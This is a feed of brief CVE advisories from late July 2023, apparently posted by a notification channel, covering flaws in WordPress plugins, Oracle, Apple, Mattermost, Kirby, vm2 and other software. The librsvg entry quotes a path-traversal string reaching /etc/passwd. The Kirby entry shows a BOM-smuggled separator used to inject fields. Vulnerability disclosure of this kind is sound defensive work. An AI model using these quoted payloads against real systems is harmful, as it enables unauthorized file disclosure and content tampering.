🚨 CVE-2023-3977Several plugins for WordPress by Inisev are vulnerable to Cross-Site Request Forgery to unauthorized installation of plugins due to a missing nonce check on the handle_installation function that is called via the inisev_installation AJAX aciton in various versions. This makes it possible for unauthenticated attackers to install plugins from the limited list via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-28 10:58:12 |
🚨 CVE-2023-32427This issue was addressed by using HTTPS when sending information over the network. This issue is fixed in Apple Music 4.2.0 for Android. An attacker in a privileged network position may be able to intercept network traffic.🎖@cveNotify |
|
| 2023-07-28 10:58:11 |
🚨 CVE-2023-3986A vulnerability was found in SourceCodester Simple Online Mens Salon Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/?page=user/list. The manipulation of the argument First Name/Last Name/Username leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235607.🎖@cveNotify |
|
| 2023-07-28 05:58:23 |
🚨 CVE-2023-3984A vulnerability, which was classified as critical, was found in phpscriptpoint RecipePoint 1.9. This affects an unknown part of the file /recipe-result. The manipulation of the argument text/category/type/difficulty/cuisine/cooking_method leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-235605 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-28 05:58:19 |
🚨 CVE-2023-38331Zoho ManageEngine Support Center Plus 14001 and below is vulnerable to stored XSS in the products module.🎖@cveNotify |
|
| 2023-07-28 05:58:18 |
🚨 CVE-2022-28860An authentication downgrade in the server in Citilog 8.0 allows an attacker (in a man in the middle position between the server and its smart camera Axis M1125) to achieve HTTP access to the camera.🎖@cveNotify |
|
| 2023-07-28 05:58:17 |
🚨 CVE-2023-3774An unhandled error in Vault Enterprise's namespace creation may cause the Vault process to crash, potentially resulting in denial of service. Fixed in 1.14.1, 1.13.5, and 1.12.9.🎖@cveNotify |
|
| 2023-07-28 05:58:13 |
🚨 CVE-2023-3794A vulnerability classified as problematic has been found in Bug Finder ChainCity Real Estate Investment Platform 1.0. Affected is an unknown function of the file /chaincity/user/ticket/create of the component New Ticket Handler. The manipulation of the argument subject leads to cross site scripting. It is possible to launch the attack remotely. VDB-235062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 05:58:12 |
🚨 CVE-2023-3799A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=article/category/del of the component Delete Category Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235067. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 05:58:11 |
🚨 CVE-2023-38633A directory traversal problem in the URL decoder of librsvg before 2.56.3 could be used by local or remote attackers to disclose files (on the local filesystem outside of the expected area), as demonstrated by href=".?../../../../../../../../../../etc/passwd" in an xi:include element.🎖@cveNotify |
|
| 2023-07-28 00:59:15 |
🚨 CVE-2023-38403iperf3 before 3.14 allows peers to cause an integer overflow and heap corruption via a crafted length field.🎖@cveNotify |
|
| 2023-07-28 00:59:13 |
🚨 CVE-2023-3800A vulnerability was found in EasyAdmin8 2.0.2.2. It has been classified as problematic. Affected is an unknown function of the file /admin/index/index.html#/admin/mall.goods/index.html of the component File Upload Module. The manipulation leads to unrestricted upload. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235068. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 00:59:08 |
🚨 CVE-2023-38404The XPRTLD web application in Veritas InfoScale Operations Manager (VIOM) before 8.0.0.410 allows an authenticated attacker to upload all types of files to the server. An authenticated attacker can then execute the malicious file to perform command execution on the remote server.🎖@cveNotify |
|
| 2023-07-28 00:59:07 |
🚨 CVE-2023-31461Attackers can exploit an open API listener on SteelSeries GG 36.0.0 to create a sub-application that will be executed automatically from a controlled location, because of a path traversal vulnerability.🎖@cveNotify |
|
| 2023-07-28 00:59:05 |
🚨 CVE-2023-31753SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.🎖@cveNotify |
|
| 2023-07-28 00:59:04 |
🚨 CVE-2023-37728Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.🎖@cveNotify |
|
| 2023-07-28 00:59:00 |
🚨 CVE-2023-3762A vulnerability was found in Intergard SGS 8.7.0. It has been classified as problematic. This affects an unknown part. The manipulation leads to cleartext storage of sensitive information in memory. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-234447. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 00:58:59 |
🚨 CVE-2023-3760A vulnerability has been found in Intergard SGS 8.7.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Change Password Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234445 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-28 00:58:58 |
🚨 CVE-2022-43701When the installation directory does not have sufficiently restrictive file permissions, an attacker can modify files in the installation directory to cause execution of malicious code.🎖@cveNotify |
|
| 2023-07-28 00:58:57 |
🚨 CVE-2022-43702When the directory containing the installer does not have sufficiently restrictive file permissions, an attacker can modify (or replace) the installer to execute malicious code.🎖@cveNotify |
|
| 2023-07-28 00:58:56 |
🚨 CVE-2022-43703An installer that loads or executes files using an unconstrained search path may be vulnerable to substitute files under control of an attacker being loaded or executed instead of the intended files.🎖@cveNotify |
|
| 2023-07-27 22:59:08 |
🚨 CVE-2023-3577Mattermost fails to properly restrict requests to localhost/intranet during the interactive dialog, which could allow an attacker to perform a limited blind SSRF.🎖@cveNotify |
|
| 2023-07-27 20:58:35 |
🚨 CVE-2023-3582Mattermost fails to verify channel membership when linking a board to a channel allowing a low-privileged authenticated user to link a Board to a private channel they don't have access to, 🎖@cveNotify |
|
| 2023-07-27 20:58:34 |
🚨 CVE-2023-37481Fides is an open-source privacy engineering platform for managing data privacy requests and privacy regulations. The Fides webserver is vulnerable to a type of Denial of Service (DoS) attack. Attackers can exploit this vulnerability to upload zip files containing malicious SVG bombs (similar to a billion laughs attack), causing resource exhaustion in Admin UI browser tabs and creating a persistent denial of service of the 'new connector' page (`datastore-connection/new`). This vulnerability affects Fides versions `2.11.0` through `2.15.1`. Exploitation is limited to users with elevated privileges with the `CONNECTOR_TEMPLATE_REGISTER` scope, which includes root users and users with the owner role. The vulnerability has been patched in Fides version `2.16.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There is no known workaround to remediate this vulnerability without upgrading.🎖@cveNotify |
|
| 2023-07-27 20:58:33 |
🚨 CVE-2023-0160A deadlock flaw was found in the Linux kernel’s BPF subsystem. This flaw allows a local user to potentially crash the system.🎖@cveNotify |
|
| 2023-07-27 20:58:29 |
🚨 CVE-2023-37474Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-27 20:58:28 |
🚨 CVE-2023-3587Mattermost fails to properly show information in the UI, allowing a system admin to modify a board state allowing any user with a valid sharing link to join the board with editor access, without the UI showing the updated permissions.🎖@cveNotify |
|
| 2023-07-27 20:58:27 |
🚨 CVE-2023-3586Mattermost fails to disable public Boards after the "Enable Publicly-Shared Boards" configuration option is disabled, resulting in previously-shared public Boards to remain accessible.🎖@cveNotify |
|
| 2023-07-27 20:58:24 |
🚨 CVE-2023-3590Mattermost fails to delete card attachments in Boards, allowing an attacker to access deleted attachments.🎖@cveNotify |
|
| 2023-07-27 20:58:23 |
🚨 CVE-2023-3300HashiCorp Nomad and Nomad Enterprise 0.11.0 up to 1.5.6 and 1.4.1 HTTP search API can reveal names of available CSI plugins to unauthenticated users or users without the plugin:read policy. Fixed in 1.6.0, 1.5.7, and 1.4.1.🎖@cveNotify |
|
| 2023-07-27 20:58:22 |
🚨 CVE-2023-38495Crossplane is a framework for building cloud native control planes without needing to write code. In versions prior to 1.11.5, 1.12.3, and 1.13.0, Crossplane's image backend does not validate the byte contents of Crossplane packages. As such, Crossplane does not detect if an attacker has tampered with a Package. The problem has been fixed in 1.11.5, 1.12.3 and 1.13.0. As a workaround, only use images from trusted sources and keep Package editing/creating privileges to administrators only.🎖@cveNotify |
|
| 2023-07-27 20:58:18 |
🚨 CVE-2023-38505DietPi-Dashboard is a web dashboard for the operating system DietPi. The dashboard only allows for one TLS handshake to be in process at a given moment. Once a TCP connection is established in HTTPS mode, it will assume that it should be waiting for a handshake, and will stay this way indefinitely until a handshake starts or some error occurs. In version 0.6.1, this can be exploited by simply not starting the handshake, preventing any other TLS handshakes from getting through. An attacker can lock the dashboard in a state where it is waiting for a TLS handshake from the attacker, who won't provide it. This prevents any legitimate traffic from getting to the dashboard, and can last indefinitely. Version 0.6.2 has a patch for this issue. As a workaround, do not use HTTPS mode on the open internet where anyone can connect. Instead, put a reverse proxy in front of the dashboard, and have it handle any HTTPS connections.🎖@cveNotify |
|
| 2023-07-27 20:58:17 |
🚨 CVE-2023-3980Cross-site Scripting (XSS) - Stored in GitHub repository omeka/omeka-s prior to 4.0.2.🎖@cveNotify |
|
| 2023-07-27 20:58:16 |
🚨 CVE-2023-3981Server-Side Request Forgery (SSRF) in GitHub repository omeka/omeka-s prior to 4.0.2.🎖@cveNotify |
|
| 2023-07-27 19:58:29 |
🚨 CVE-2023-22006Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:28 |
🚨 CVE-2023-22010Vulnerability in Oracle Essbase (component: Security and Provisioning). The supported version that is affected is 21.4.3.0.0. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Essbase. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Essbase accessible data. CVSS 3.1 Base Score 2.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:27 |
🚨 CVE-2023-22023Vulnerability in the Oracle Solaris product of Oracle Systems (component: Device Driver Interface). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: CVE-2023-22023 is equivalent to CVE-2023-31284. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-07-27 19:58:24 |
🚨 CVE-2023-22014Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where PeopleSoft Enterprise PeopleTools executes to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 8.4 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-07-27 19:58:23 |
🚨 CVE-2023-22034Vulnerability in the Unified Audit component of Oracle Database Server. Supported versions that are affected are 19.3-19.19 and 21.3-21.10. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with network access via Oracle Net to compromise Unified Audit. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Unified Audit accessible data. CVSS 3.1 Base Score 4.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:22 |
🚨 CVE-2023-22037Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: MS Excel Specific). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 6.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L).🎖@cveNotify |
|
| 2023-07-27 19:58:18 |
🚨 CVE-2023-22052Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.19 and 21.3-21.10. Difficult to exploit vulnerability allows low privileged attacker having Create Session, Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:17 |
🚨 CVE-2023-22039Vulnerability in the Oracle Agile PLM product of Oracle Supply Chain (component: WebClient). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile PLM. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Agile PLM, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Agile PLM accessible data as well as unauthorized read access to a subset of Oracle Agile PLM accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:13 |
🚨 CVE-2023-22050Vulnerability in the JD Edwards EnterpriseOne Orchestrator product of Oracle JD Edwards (component: E1 IOT Orchestrator Security). Supported versions that are affected are Prior to 9.2.7.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Orchestrator. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Orchestrator accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Orchestrator accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:12 |
🚨 CVE-2023-22049Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-07-27 19:58:11 |
🚨 CVE-2023-22044Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u371-perf, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-07-27 16:58:25 |
🚨 CVE-2023-38488Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 affects all Kirby sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to update a Kirby content file (e.g. via a contact or comment form). Kirby sites are *not* affected if they don't allow write access for untrusted users or visitors.A field injection in a content storage implementation is a type of vulnerability that allows attackers with content write access to overwrite content fields that the site developer didn't intend to be modified. In a Kirby site this can be used to alter site content, break site behavior or inject malicious data or code. The exact security risk depends on the field type and usage.Kirby stores content of the site, of pages, files and users in text files by default. The text files use Kirby's KirbyData format where each field is separated by newlines and a line with four dashes (`----`). When reading a KirbyData file, the affected code first removed the Unicode BOM sequence from the file contents and afterwards split the content into fields by the field separator.When writing to a KirbyData file, field separators in field data are escaped to prevent user input from interfering with the field structure. However this escaping could be tricked by including a Unicode BOM sequence in a field separator (e.g. `--\xEF\xBB\xBF--`). When writing, this was not detected as a separator, but because the BOM was removed during reading, it could be abused by attackers to inject other field data into content files.Because each field can only be defined once per content file, this vulnerability only affects fields in the content file that were defined above the vulnerable user-writable field or not at all. Fields that are defined below the vulnerable field override the injected field content and were therefore already protected.The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and Kirby 3.9.6. In all of the mentioned releases, the maintainers have fixed the affected code to only remove the Unicode BOM sequence at the beginning of the file. This fixes this vulnerability both for newly written as well as for existing content files.🎖@cveNotify |
|
| 2023-07-27 16:58:24 |
🚨 CVE-2023-38489Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 affects all Kirby sites with user accounts (unless Kirby's API and Panel are disabled in the config). It can only be abused if a Kirby user is logged in on a device or browser that is shared with potentially untrusted users or if an attacker already maliciously used a previous password to log in to a Kirby site as the affected user.Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization. In the variation described in this advisory, it allows attackers to stay logged in to a Kirby site on another device even if the logged in user has since changed their password. Kirby did not invalidate user sessions that were created with a password that was since changed by the user or by a site admin. If a user changed their password to lock out an attacker who was already in possession of the previous password or of a login session on another device or browser, the attacker would not be reliably prevented from accessing the Kirby site as the affected user.The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and Kirby 3.9.6. In all of the mentioned releases, the maintainers have updated the authentication implementation to keep track of the hashed password in each active session. If the password changed since the login, the session is invalidated. To enforce this fix even if the vulnerability was previously abused, all users are logged out from the Kirby site after updating to one of the patched releases.🎖@cveNotify |
|
| 2023-07-27 16:58:20 |
🚨 CVE-2023-3973Cross-site Scripting (XSS) - Reflected in GitHub repository jgraph/drawio prior to 21.6.3.🎖@cveNotify |
|
| 2023-07-27 16:58:19 |
🚨 CVE-2023-3975OS Command Injection in GitHub repository jgraph/drawio prior to 21.5.0.🎖@cveNotify |
|
| 2023-07-27 16:58:18 |
🚨 CVE-2022-26563An issue was discovered in Tildeslash Monit before 5.31.0, allows remote attackers to gain escilated privlidges due to improper PAM-authorization.🎖@cveNotify |
|
| 2023-07-27 16:58:14 |
🚨 CVE-2022-34155Improper Authentication vulnerability in miniOrange OAuth Single Sign On – SSO (OAuth Client) plugin allows Authentication Bypass.This issue affects OAuth Single Sign On – SSO (OAuth Client): from n/a through 6.23.3.🎖@cveNotify |
|
| 2023-07-27 16:58:13 |
🚨 CVE-2022-33065Multiple signed integers overflow in function au_read_header in src/au.c and in functions mat4_open and mat4_read_header in src/mat4.c in Libsndfile, allows an attacker to cause Denial of Service or other unspecified impacts.🎖@cveNotify |
|
| 2023-07-27 16:58:12 |
🚨 CVE-2020-36762A vulnerability was found in ONS Digital RAS Collection Instrument up to 2.0.27 and classified as critical. Affected by this issue is the function jobs of the file .github/workflows/comment.yml. The manipulation of the argument $COMMENT_BODY leads to os command injection. Upgrading to version 2.0.28 is able to address this issue. The name of the patch is dcaad2540f7d50c512ff2e031d3778dd9337db2b. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-234248.🎖@cveNotify |
|
| 2023-07-27 14:58:32 |
🚨 CVE-2023-38286Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI.🎖@cveNotify |
|
| 2023-07-27 14:58:30 |
🚨 CVE-2023-2082The "Buy Me a Coffee – Button and Widget Plugin" plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 3.6 due to insufficient sanitization and escaping on the 'text value set via the bmc_post_reception action. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to inject arbitrary web scripts into pages that execute whenever a victim accesses a page with the injected scripts.🎖@cveNotify |
|
| 2023-07-27 14:58:29 |
🚨 CVE-2023-3668Improper Encoding or Escaping of Output in GitHub repository froxlor/froxlor prior to 2.0.21.🎖@cveNotify |
|
| 2023-07-27 14:58:27 |
🚨 CVE-2023-37466vm2 is an advanced vm/sandbox for Node.js. The library contains critical security issues and should not be used for production. The maintenance of the project has been discontinued. In vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed with `@@species` accessor property allowing attackers to escape the sandbox and run arbitrary code. Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox.🎖@cveNotify |
|
| 2023-07-27 14:58:26 |
🚨 CVE-2023-32450Dell Power Manager, Versions 3.3 to 3.14 contains an Improper Access Control vulnerability. A low-privileged malicious user may potentially exploit this vulnerability to perform arbitrary code execution with limited access.🎖@cveNotify |
|
| 2023-07-27 14:58:25 |
🚨 CVE-2023-3956The InstaWP Connect plugin for WordPress is vulnerable to unauthorized access of data, modification of data and loss of data due to a missing capability check on the 'events_receiver' function in versions up to, and including, 0.0.9.18. This makes it possible for unauthenticated attackers to add, modify or delete post and taxonomy, install, activate or deactivate plugin, change customizer settings, add or modify or delete user including administrator user.🎖@cveNotify |
|
| 2023-07-27 14:58:24 |
🚨 CVE-2023-3957The ACF Photo Gallery Field plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient restriction on the 'apg_profile_update' function in versions up to, and including, 1.9. This makes it possible for authenticated attackers, with subscriber-level permissions or above, to update the user metas arbitrarily. The meta value can only be a string.🎖@cveNotify |
|
| 2023-07-27 14:58:22 |
🚨 CVE-2023-28012HCL BigFix Mobile is vulnerable to a command injection attack. An authenticated attacker could run arbitrary shell commands on the WebUI server.🎖@cveNotify |
|
| 2023-07-27 14:58:21 |
🚨 CVE-2023-28014HCL BigFix Mobile is vulnerable to a cross-site scripting attack. An authenticated attacker could inject malicious scripts into the application.🎖@cveNotify |
|
| 2023-07-27 14:58:20 |
🚨 CVE-2023-32381A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.6.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-27 14:58:19 |
🚨 CVE-2023-32433A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-27 14:58:18 |
🚨 CVE-2023-32437The issue was addressed with improvements to the file handling protocol. This issue is fixed in iOS 16.6 and iPadOS 16.6. An app may be able to break out of its sandbox.🎖@cveNotify |
|
| 2023-07-27 14:58:17 |
🚨 CVE-2023-35983This issue was addressed with improved data protection. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2023-07-27 14:58:16 |
🚨 CVE-2023-36854The issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-07-27 14:58:15 |
🚨 CVE-2023-36862A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Ventura 13.5. An app may be able to determine a user’s current location.🎖@cveNotify |
|
| 2023-07-27 14:58:14 |
🚨 CVE-2023-37450The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, Safari 16.5.2, tvOS 16.6, macOS Ventura 13.5, watchOS 9.6. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-07-27 10:58:29 |
🚨 CVE-2023-3757A vulnerability classified as problematic has been found in GZ Scripts Car Rental Script 1.8. Affected is an unknown function of the file /EventBookingCalendar/load.php?controller=GzFront/action=checkout/cid=1/layout=calendar/show_header=T/local=3. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234432. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-27 10:58:24 |
🚨 CVE-2023-3956The InstaWP Connect plugin for WordPress is vulnerable to unauthorized access of data, modification of data and loss of data due to a missing capability check on the 'events_receiver' function in versions up to, and including, 0.0.9.18. This makes it possible for unauthenticated attackers to add, modify or delete post and taxonomy, install, activate or deactivate plugin, change customizer settings, add or modify or delete user including administrator user.🎖@cveNotify |
|
| 2023-07-27 10:58:23 |
🚨 CVE-2023-3957The ACF Photo Gallery Field plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient restriction on the 'apg_profile_update' function in versions up to, and including, 1.9. This makes it possible for authenticated attackers, with subscriber-level permissions or above, to update the user metas arbitrarily. The meta value can only be a string.🎖@cveNotify |
|
| 2023-07-27 10:58:22 |
🚨 CVE-2023-25074Improper privilege validation in Command Centre Server allows authenticated unprivileged operators to modify and view Competencies.This issue affects Command Centre: vEL8.90 prior to vEL8.90.1318 (MR1), vEL8.80 prior to vEL8.80.1192 (MR2), vEL8.70 prior to vEL8.70.2185 (MR4), vEL8.60 prior to vEL8.60.2347 (MR6),vEL8.50 prior to vEL8.50.2831 (MR8), all versions vEL8.40 and prior.🎖@cveNotify |
|
| 2023-07-27 10:58:21 |
🚨 CVE-2023-32001libcurl can be told to save cookie, HSTS and/or alt-svc data to files. Whendoing this, it called `stat()` followed by `fopen()` in a way that made itvulnerable to a TOCTOU race condition problem.By exploiting this flaw, an attacker could trick the victim to create oroverwrite protected files holding this data in ways it was not intended to.🎖@cveNotify |
|
| 2023-07-27 10:58:16 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-07-27 10:58:15 |
🚨 CVE-2023-33460There's a memory leak in yajl 2.1.0 with use of yajl_tree_parse function. which will cause out-of-memory in server and cause crash.🎖@cveNotify |
|
| 2023-07-27 10:58:14 |
